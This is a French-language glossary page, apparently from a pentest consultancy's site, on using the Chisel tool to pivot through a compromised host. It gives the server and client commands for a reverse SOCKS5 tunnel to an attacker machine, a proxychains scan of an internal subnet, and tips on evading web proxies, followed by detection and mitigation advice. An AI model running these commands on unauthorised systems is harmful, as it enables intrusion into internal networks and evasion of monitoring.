Chisel Pivoting
hackingDéfinition
Chisel est un outil de tunneling TCP/UDP rapide écrit en Go, utilisant le protocole WebSocket sur HTTP/HTTPS pour créer des tunnels réseau. En contexte de pentest, il est utilisé pour le pivoting : créer des tunnels qui permettent d'accéder à des réseaux internes inaccessibles directement, en passant par un système compromis qui agit comme relay.
L'architecture de Chisel est client-serveur : le serveur s'exécute sur la machine de l'attaquant et le client s'exécute sur le pivot (système compromis). La connexion peut être initiée dans les deux sens : le mode standard (client sur le pivot se connecte au serveur de l'attaquant) ou le mode reverse (le serveur écoute sur le pivot et le client sur la machine de l'attaquant se connecte). Le mode reverse est particulièrement utile quand le pivot n'est pas directement joignable depuis la machine de l'attaquant.
Chisel supporte la création de proxies SOCKS5 : chisel server -p 8080 --reverse (attaquant) + chisel client attaquant:8080 R:socks (pivot) crée un proxy SOCKS5 inverse sur le port 1080 de l'attaquant. Avec proxychains configuré pour utiliser ce proxy (socks5 127.0.0.1 1080), tous les outils de l'attaquant peuvent utiliser le proxy pour accéder au réseau interne.
Le transport WebSocket sur HTTP/HTTPS de Chisel est son principal avantage : dans des environnements où seul le trafic web est autorisé en sortie (proxy HTTP d'entreprise), Chisel peut traverser ce proxy si les WebSockets sont autorisés. L'utilisation de HTTPS rend le tunnel indistinguable du trafic HTTPS normal pour les inspections superficielles.
Comparé à Ligolo-ng (qui crée une interface réseau virtuelle), Chisel est plus léger et plus discret mais nécessite proxychains pour router les outils, ne supporte pas ICMP, et peut avoir des performances inférieures sur des connexions à haute latence.
Fonctionnement
Mode reverse SOCKS (le cas le plus commun en pentest) : attaquant lance chisel server --reverse -p 8080, pivot exécute chisel client attaquant:8080 R:socks. Le proxy SOCKS5 est disponible sur 127.0.0.1:1080 de l'attaquant. proxychains.conf : socks5 127.0.0.1 1080. Ensuite : proxychains nmap -sT -p 22,80,443,8080 10.10.10.0/24 scanne le réseau interne via le pivot.
Exploitation offensive
Chisel est particulièrement efficace dans les environnements avec proxy HTTP d'entreprise (WebSocket autorisé) où d'autres méthodes de tunneling (SSH, netcat) sont bloquées. Sa capacité à opérer sur des ports communs (80, 443, 8080) et son trafic ressemblant à du WebSocket HTTP légitime le rendent difficile à bloquer sans couper le trafic web légitime.
Détection et mitigation
Le trafic Chisel génère des connexions WebSocket longue durée vers des serveurs externes, souvent sur des ports web standards. L'analyse du trafic WebSocket (fréquence des frames, volumes, comportements de keepalive) peut révéler des connexions Chisel. Un pare-feu avec inspection applicative (Layer 7) peut identifier et bloquer les connexions Chisel basé sur leurs patterns de frames WebSocket.
Articles liés
Expert en cybersécurité offensive et intelligence artificielle. Pentest, audit et développement IA sur-mesure.
Services
- Audit Infrastructure
- Audit Kubernetes
- Audit Microsoft 365
- Audit Sécurité Réseau
- Analyse de Risques
- Audit Active Directory
- Audit Application Web
- Audit Cloud (AWS/Azure/GCP)
- Audit Messagerie
- Audit API (OWASP Top 10)
- Audit DevSecOps & CI/CD
- Audit Code Source (SAST)
- Audit Postes de Travail
- Audit Sauvegarde & Résilience
- Audit OT/SCADA (IEC 62443)
- Développement IA
- Formations
Ressources
Projets & Outils
© 2026 Ayi NEDJIMI Consultants. Tous droits réservés.
Un projet cybersécurité ?
Expert dispo · Réponse 24h